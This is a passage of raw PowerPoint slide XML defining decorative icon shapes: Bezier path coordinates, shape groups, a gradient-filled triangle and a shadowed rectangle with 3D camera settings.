                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
